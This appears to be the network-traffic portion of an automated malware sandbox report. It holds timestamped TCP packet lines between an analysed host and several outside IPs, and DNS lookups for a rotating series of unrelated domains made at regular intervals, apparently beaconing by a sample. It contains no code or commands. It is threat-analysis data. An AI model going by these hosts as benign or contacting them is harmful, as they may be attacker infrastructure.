                                May 28, 2024 07:16:39.843506098 CEST4972980192.168.2.692.205.15.157
                                May 28, 2024 07:16:39.845788956 CEST4972980192.168.2.692.205.15.157
                                May 28, 2024 07:16:39.850579023 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598762035 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598783970 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598793983 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598800898 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598808050 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598818064 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598830938 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598841906 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598853111 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598866940 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.598886013 CEST4972980192.168.2.692.205.15.157
                                May 28, 2024 07:16:40.598961115 CEST4972980192.168.2.692.205.15.157
                                May 28, 2024 07:16:40.598980904 CEST804972992.205.15.157192.168.2.6
                                May 28, 2024 07:16:40.599028111 CEST4972980192.168.2.692.205.15.157
                                May 28, 2024 07:16:41.354286909 CEST4972980192.168.2.692.205.15.157
                                May 28, 2024 07:16:42.369868994 CEST4973080192.168.2.692.205.15.157
                                May 28, 2024 07:16:42.374912977 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:42.374994040 CEST4973080192.168.2.692.205.15.157
                                May 28, 2024 07:16:42.377017021 CEST4973080192.168.2.692.205.15.157
                                May 28, 2024 07:16:42.382025003 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.217966080 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.217991114 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218003988 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218014956 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218020916 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218033075 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218044043 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218056917 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218067884 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218079090 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.218146086 CEST4973080192.168.2.692.205.15.157
                                May 28, 2024 07:16:43.218146086 CEST4973080192.168.2.692.205.15.157
                                May 28, 2024 07:16:43.218820095 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.224561930 CEST804973092.205.15.157192.168.2.6
                                May 28, 2024 07:16:43.226248026 CEST4973080192.168.2.692.205.15.157
                                May 28, 2024 07:16:43.881941080 CEST4973080192.168.2.692.205.15.157
                                May 28, 2024 07:16:44.904386997 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:44.909403086 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:44.914305925 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:44.914307117 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:44.919254065 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:44.919297934 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.672919989 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.672935963 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.672950983 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.672960043 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.672970057 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.672987938 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.673003912 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.673012972 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.673021078 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.673029900 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.673028946 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:45.673084974 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:45.673145056 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:45.677903891 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.677922010 CEST804973192.205.15.157192.168.2.6
                                May 28, 2024 07:16:45.682167053 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:46.429851055 CEST4973180192.168.2.692.205.15.157
                                May 28, 2024 07:16:47.450499058 CEST4973280192.168.2.692.205.15.157
                                May 28, 2024 07:16:47.455459118 CEST804973292.205.15.157192.168.2.6
                                May 28, 2024 07:16:47.456326962 CEST4973280192.168.2.692.205.15.157
                                May 28, 2024 07:16:47.460633993 CEST4973280192.168.2.692.205.15.157
                                May 28, 2024 07:16:47.465488911 CEST804973292.205.15.157192.168.2.6
                                May 28, 2024 07:16:48.167815924 CEST804973292.205.15.157192.168.2.6
                                May 28, 2024 07:16:48.167895079 CEST804973292.205.15.157192.168.2.6
                                May 28, 2024 07:16:48.168008089 CEST4973280192.168.2.692.205.15.157
                                May 28, 2024 07:16:48.172370911 CEST4973280192.168.2.692.205.15.157
                                May 28, 2024 07:16:48.177277088 CEST804973292.205.15.157192.168.2.6
                                May 28, 2024 07:16:53.326823950 CEST4973380192.168.2.676.223.67.189
                                May 28, 2024 07:16:53.331753016 CEST804973376.223.67.189192.168.2.6
                                May 28, 2024 07:16:53.331990004 CEST4973380192.168.2.676.223.67.189
                                May 28, 2024 07:16:53.334171057 CEST4973380192.168.2.676.223.67.189
                                May 28, 2024 07:16:53.339023113 CEST804973376.223.67.189192.168.2.6
                                May 28, 2024 07:16:53.798252106 CEST804973376.223.67.189192.168.2.6
                                May 28, 2024 07:16:53.806155920 CEST4973380192.168.2.676.223.67.189
                                May 28, 2024 07:16:54.834925890 CEST4973380192.168.2.676.223.67.189
                                May 28, 2024 07:16:54.839864016 CEST804973376.223.67.189192.168.2.6
                                May 28, 2024 07:16:55.853502989 CEST4973480192.168.2.676.223.67.189
                                May 28, 2024 07:16:55.858417034 CEST804973476.223.67.189192.168.2.6
                                May 28, 2024 07:16:55.858500004 CEST4973480192.168.2.676.223.67.189
                                May 28, 2024 07:16:55.860764027 CEST4973480192.168.2.676.223.67.189
                                May 28, 2024 07:16:55.865586042 CEST804973476.223.67.189192.168.2.6
                                May 28, 2024 07:16:56.327611923 CEST804973476.223.67.189192.168.2.6
                                May 28, 2024 07:16:56.327670097 CEST4973480192.168.2.676.223.67.189
                                May 28, 2024 07:16:57.366127968 CEST4973480192.168.2.676.223.67.189
                                May 28, 2024 07:16:57.371192932 CEST804973476.223.67.189192.168.2.6
                                May 28, 2024 07:16:58.386217117 CEST4973580192.168.2.676.223.67.189
                                May 28, 2024 07:16:58.391164064 CEST804973576.223.67.189192.168.2.6
                                May 28, 2024 07:16:58.391231060 CEST4973580192.168.2.676.223.67.189
                                May 28, 2024 07:16:58.393496990 CEST4973580192.168.2.676.223.67.189
                                May 28, 2024 07:16:58.398360014 CEST804973576.223.67.189192.168.2.6
                                May 28, 2024 07:16:58.398499966 CEST804973576.223.67.189192.168.2.6
                                May 28, 2024 07:16:58.885572910 CEST804973576.223.67.189192.168.2.6
                                May 28, 2024 07:16:58.888358116 CEST4973580192.168.2.676.223.67.189
                                May 28, 2024 07:16:59.897350073 CEST4973580192.168.2.676.223.67.189
                                May 28, 2024 07:16:59.902231932 CEST804973576.223.67.189192.168.2.6
                                May 28, 2024 07:17:00.916306973 CEST4973680192.168.2.676.223.67.189
                                May 28, 2024 07:17:00.921374083 CEST804973676.223.67.189192.168.2.6
                                May 28, 2024 07:17:00.926425934 CEST4973680192.168.2.676.223.67.189
                                May 28, 2024 07:17:00.926425934 CEST4973680192.168.2.676.223.67.189
                                May 28, 2024 07:17:00.931384087 CEST804973676.223.67.189192.168.2.6
                                May 28, 2024 07:17:01.417190075 CEST804973676.223.67.189192.168.2.6
                                May 28, 2024 07:17:01.417207956 CEST804973676.223.67.189192.168.2.6
                                May 28, 2024 07:17:01.418272972 CEST4973680192.168.2.676.223.67.189
                                May 28, 2024 07:17:01.434259892 CEST4973680192.168.2.676.223.67.189
                                May 28, 2024 07:17:01.439321041 CEST804973676.223.67.189192.168.2.6
                                May 28, 2024 07:17:06.739501953 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:06.744386911 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:06.746232033 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:06.750149012 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:06.755997896 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266199112 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266217947 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266230106 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266235113 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266241074 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266253948 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266266108 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266277075 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266288996 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266300917 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.266308069 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:07.266390085 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:07.266390085 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:07.271333933 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.284126997 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.284137964 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.284179926 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:07.355633974 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.355684996 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.355695009 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.355701923 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:07.355705023 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.355714083 CEST8049737216.40.34.41192.168.2.6
                                May 28, 2024 07:17:07.355789900 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:07.355789900 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:08.258269072 CEST4973780192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.276375055 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.281372070 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.281512976 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.283747911 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.288573027 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847301960 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847424030 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847434998 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847445965 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847455025 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847465992 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847475052 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.847522974 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.847537994 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.847553968 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847567081 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847578049 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847600937 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.847744942 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.847806931 CEST4973880192.168.2.6216.40.34.41
                                May 28, 2024 07:17:09.855135918 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:09.865073919 CEST8049738216.40.34.41192.168.2.6
                                May 28, 2024 07:17:56.331829071 CEST8049752178.63.50.103192.168.2.6
                                May 28, 2024 07:17:56.331964016 CEST4975280192.168.2.6178.63.50.103
                                May 28, 2024 07:17:56.334506035 CEST4975280192.168.2.6178.63.50.103
                                May 28, 2024 07:17:56.339328051 CEST8049752178.63.50.103192.168.2.6
                                May 28, 2024 07:18:01.710146904 CEST4975380192.168.2.6108.179.192.228
                                May 28, 2024 07:18:01.715034962 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:01.718209028 CEST4975380192.168.2.6108.179.192.228
                                May 28, 2024 07:18:01.720040083 CEST4975380192.168.2.6108.179.192.228
                                May 28, 2024 07:18:01.725410938 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:02.251393080 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:02.251408100 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:02.251418114 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:02.251430035 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:02.251439095 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:02.251466036 CEST4975380192.168.2.6108.179.192.228
                                May 28, 2024 07:18:02.251528978 CEST8049753108.179.192.228192.168.2.6
                                May 28, 2024 07:18:02.251532078 CEST4975380192.168.2.6108.179.192.228
                                May 28, 2024 07:18:02.251584053 CEST4975380192.168.2.6108.179.192.228
                                May 28, 2024 07:18:03.226412058 CEST4975380192.168.2.6108.179.192.228
                                May 28, 2024 07:18:04.246011019 CEST4975480192.168.2.6108.179.192.228
                                May 28, 2024 07:18:04.250925064 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.251003027 CEST4975480192.168.2.6108.179.192.228
                                May 28, 2024 07:18:04.253452063 CEST4975480192.168.2.6108.179.192.228
                                May 28, 2024 07:18:04.258373976 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.753633976 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.753657103 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.753674030 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.753695011 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.753711939 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.753757000 CEST4975480192.168.2.6108.179.192.228
                                May 28, 2024 07:18:04.753804922 CEST4975480192.168.2.6108.179.192.228
                                May 28, 2024 07:18:04.753844023 CEST8049754108.179.192.228192.168.2.6
                                May 28, 2024 07:18:04.753905058 CEST4975480192.168.2.6108.179.192.228
                                May 28, 2024 07:18:05.756824017 CEST4975480192.168.2.6108.179.192.228
                                May 28, 2024 07:18:06.774996996 CEST4975580192.168.2.6108.179.192.228
                                May 28, 2024 07:18:06.779984951 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:06.780060053 CEST4975580192.168.2.6108.179.192.228
                                May 28, 2024 07:18:06.781691074 CEST4975580192.168.2.6108.179.192.228
                                May 28, 2024 07:18:06.786647081 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:06.786744118 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.330986977 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.331016064 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.331034899 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.331052065 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.331068993 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.331089020 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.331089973 CEST4975580192.168.2.6108.179.192.228
                                May 28, 2024 07:18:07.331103086 CEST8049755108.179.192.228192.168.2.6
                                May 28, 2024 07:18:07.331166983 CEST4975580192.168.2.6108.179.192.228
                                May 28, 2024 07:18:07.331222057 CEST4975580192.168.2.6108.179.192.228
                                May 28, 2024 07:18:08.287954092 CEST4975580192.168.2.6108.179.192.228
                                May 28, 2024 07:18:09.307149887 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:09.313925982 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.314021111 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:09.316607952 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:09.323198080 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834038019 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834083080 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834093094 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834105015 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834115028 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834126949 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834137917 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834150076 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834161043 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834172964 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.834304094 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:09.834305048 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:09.839232922 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.839255095 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:09.842679977 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:09.868868113 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:10.081557035 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:10.081752062 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:10.083293915 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:10.083352089 CEST8049756108.179.192.228192.168.2.6
                                May 28, 2024 07:18:10.083498955 CEST4975680192.168.2.6108.179.192.228
                                May 28, 2024 07:18:15.196396112 CEST4975780192.168.2.6149.88.84.60
                                May 28, 2024 07:18:15.201422930 CEST8049757149.88.84.60192.168.2.6
                                May 28, 2024 07:18:15.204199076 CEST4975780192.168.2.6149.88.84.60
                                May 28, 2024 07:18:15.208739996 CEST4975780192.168.2.6149.88.84.60
                                May 28, 2024 07:18:15.213836908 CEST8049757149.88.84.60192.168.2.6
                                May 28, 2024 07:18:16.709808111 CEST4975780192.168.2.6149.88.84.60
                                May 28, 2024 07:18:16.762710094 CEST8049757149.88.84.60192.168.2.6
                                May 28, 2024 07:18:17.728982925 CEST4975880192.168.2.6149.88.84.60
                                May 28, 2024 07:18:17.733944893 CEST8049758149.88.84.60192.168.2.6
                                May 28, 2024 07:18:17.738013983 CEST4975880192.168.2.6149.88.84.60
                                May 28, 2024 07:18:17.738014936 CEST4975880192.168.2.6149.88.84.60
                                May 28, 2024 07:18:17.742949963 CEST8049758149.88.84.60192.168.2.6
                                May 28, 2024 07:18:19.242216110 CEST4975880192.168.2.6149.88.84.60
                                May 28, 2024 07:18:19.290843964 CEST8049758149.88.84.60192.168.2.6
                                May 28, 2024 07:18:20.259654999 CEST4975980192.168.2.6149.88.84.60
                                May 28, 2024 07:18:20.264736891 CEST8049759149.88.84.60192.168.2.6
                                May 28, 2024 07:18:20.264806032 CEST4975980192.168.2.6149.88.84.60
                                May 28, 2024 07:18:20.266633034 CEST4975980192.168.2.6149.88.84.60
                                May 28, 2024 07:18:20.271610975 CEST8049759149.88.84.60192.168.2.6
                                May 28, 2024 07:18:20.271644115 CEST8049759149.88.84.60192.168.2.6
                                May 28, 2024 07:18:21.774116993 CEST4975980192.168.2.6149.88.84.60
                                May 28, 2024 07:18:21.822827101 CEST8049759149.88.84.60192.168.2.6
                                May 28, 2024 07:18:22.936908007 CEST4976080192.168.2.6149.88.84.60
                                May 28, 2024 07:18:22.941935062 CEST8049760149.88.84.60192.168.2.6
                                May 28, 2024 07:18:22.942002058 CEST4976080192.168.2.6149.88.84.60
                                May 28, 2024 07:18:22.943495989 CEST4976080192.168.2.6149.88.84.60
                                May 28, 2024 07:18:22.948411942 CEST8049760149.88.84.60192.168.2.6
                                May 28, 2024 07:18:36.596852064 CEST8049757149.88.84.60192.168.2.6
                                May 28, 2024 07:18:36.596906900 CEST4975780192.168.2.6149.88.84.60
                                May 28, 2024 07:18:39.124489069 CEST8049758149.88.84.60192.168.2.6
                                May 28, 2024 07:18:39.134057999 CEST4975880192.168.2.6149.88.84.60
                                May 28, 2024 07:18:41.654541016 CEST8049759149.88.84.60192.168.2.6
                                May 28, 2024 07:18:41.658338070 CEST4975980192.168.2.6149.88.84.60
                                May 28, 2024 07:18:44.345187902 CEST8049760149.88.84.60192.168.2.6
                                May 28, 2024 07:18:44.345316887 CEST4976080192.168.2.6149.88.84.60
                                May 28, 2024 07:18:44.346210957 CEST4976080192.168.2.6149.88.84.60
                                May 28, 2024 07:18:44.351058006 CEST8049760149.88.84.60192.168.2.6
                                May 28, 2024 07:18:49.372250080 CEST4976180192.168.2.63.33.130.190
                                May 28, 2024 07:18:49.377194881 CEST80497613.33.130.190192.168.2.6
                                May 28, 2024 07:18:49.380784035 CEST4976180192.168.2.63.33.130.190
                                May 28, 2024 07:18:49.380784035 CEST4976180192.168.2.63.33.130.190
                                May 28, 2024 07:18:49.385654926 CEST80497613.33.130.190192.168.2.6
                                May 28, 2024 07:18:49.866945028 CEST80497613.33.130.190192.168.2.6
                                May 28, 2024 07:18:49.867058992 CEST4976180192.168.2.63.33.130.190
                                May 28, 2024 07:18:50.897634029 CEST4976180192.168.2.63.33.130.190
                                May 28, 2024 07:18:50.902755976 CEST80497613.33.130.190192.168.2.6
                                May 28, 2024 07:18:51.915447950 CEST4976280192.168.2.63.33.130.190
                                May 28, 2024 07:18:51.920701027 CEST80497623.33.130.190192.168.2.6
                                May 28, 2024 07:18:51.920891047 CEST4976280192.168.2.63.33.130.190
                                May 28, 2024 07:18:51.922416925 CEST4976280192.168.2.63.33.130.190
                                May 28, 2024 07:18:51.927256107 CEST80497623.33.130.190192.168.2.6
                                May 28, 2024 07:18:53.429009914 CEST4976280192.168.2.63.33.130.190
                                May 28, 2024 07:18:53.434637070 CEST80497623.33.130.190192.168.2.6
                                May 28, 2024 07:18:53.434750080 CEST4976280192.168.2.63.33.130.190
                                May 28, 2024 07:18:54.481337070 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:54.486394882 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:54.486473083 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:54.501610041 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:54.506642103 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:54.506664038 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:54.950639963 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:54.950751066 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:56.554537058 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:56.563266993 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:57.571978092 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:57.579929113 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:57.580033064 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:57.581764936 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:57.589044094 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:58.062290907 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:58.062423944 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:58.062472105 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:58.064677954 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:58.069515944 CEST80497643.33.130.190192.168.2.6
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                May 28, 2024 07:15:19.203845978 CEST | 192.168.2.6 | 1.1.1.1 | 0x6185 | Standard query (0) | www.ilodezu.com | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:15:35.962555885 CEST | 192.168.2.6 | 1.1.1.1 | 0xc916 | Standard query (0) | www.vpachurch.org.uk | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:15:50.353135109 CEST | 192.168.2.6 | 1.1.1.1 | 0xc363 | Standard query (0) | www.shopnaya.fr | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:04.728287935 CEST | 192.168.2.6 | 1.1.1.1 | 0x8314 | Standard query (0) | www.dolcegusto-quiz.fun | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:12.806751013 CEST | 192.168.2.6 | 1.1.1.1 | 0xacd2 | Standard query (0) | www.etrading.cloud | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:26.499382973 CEST | 192.168.2.6 | 1.1.1.1 | 0xb1be | Standard query (0) | www.ceo-retreats.co.uk | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:39.823669910 CEST | 192.168.2.6 | 1.1.1.1 | 0x4b03 | Standard query (0) | www.mavonorm-global.uk | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:53.186188936 CEST | 192.168.2.6 | 1.1.1.1 | 0x9e7c | Standard query (0) | www.adhdphotography.com | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:06.450376034 CEST | 192.168.2.6 | 1.1.1.1 | 0x15f4 | Standard query (0) | www.allgiftedmalaysia.com | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:19.870450974 CEST | 192.168.2.6 | 1.1.1.1 | 0xac30 | Standard query (0) | www.shortput.top | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:33.760253906 CEST | 192.168.2.6 | 1.1.1.1 | 0x8543 | Standard query (0) | www.cuddle-paws.co.uk | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:17:47.090984106 CEST | 192.168.2.6 | 1.1.1.1 | 0x5341 | Standard query (0) | www.home-stroi0m.ru | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:18:01.338180065 CEST | 192.168.2.6 | 1.1.1.1 | 0x8aa4 | Standard query (0) | www.betopfloor.com | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:18:14.869710922 CEST | 192.168.2.6 | 1.1.1.1 | 0x80b4 | Standard query (0) | www.bade.ink | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:18:49.355304003 CEST | 192.168.2.6 | 1.1.1.1 | 0xcbce | Standard query (0) | www.futurereadyteaming.com | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                May 28, 2024 07:15:19.243500948 CEST | 1.1.1.1 | 192.168.2.6 | 0x6185 | No error (0) | www.ilodezu.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:15:19.243500948 CEST | 1.1.1.1 | 192.168.2.6 | 0x6185 | No error (0) | www.ilodezu.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:15:35.974420071 CEST | 1.1.1.1 | 192.168.2.6 | 0xc916 | No error (0) | www.vpachurch.org.uk | vpachurch.org.uk | | CNAME (Canonical name) | IN (0x0001) | false
                                May 28, 2024 07:15:35.974420071 CEST | 1.1.1.1 | 192.168.2.6 | 0xc916 | No error (0) | vpachurch.org.uk | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:15:35.974420071 CEST | 1.1.1.1 | 192.168.2.6 | 0xc916 | No error (0) | vpachurch.org.uk | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:15:50.383105040 CEST | 1.1.1.1 | 192.168.2.6 | 0xc363 | No error (0) | www.shopnaya.fr | | 212.227.172.254 | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:04.740528107 CEST | 1.1.1.1 | 192.168.2.6 | 0x8314 | Server failure (2) | www.dolcegusto-quiz.fun | none | none | A (IP address) | IN (0x0001) | false
                                May 28, 2024 07:16:12.932435036 CEST | 1.1.1.1 | 192.168.2.6 | 0xacd2 | No error (0) | www.etrading.cloud | 94950.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
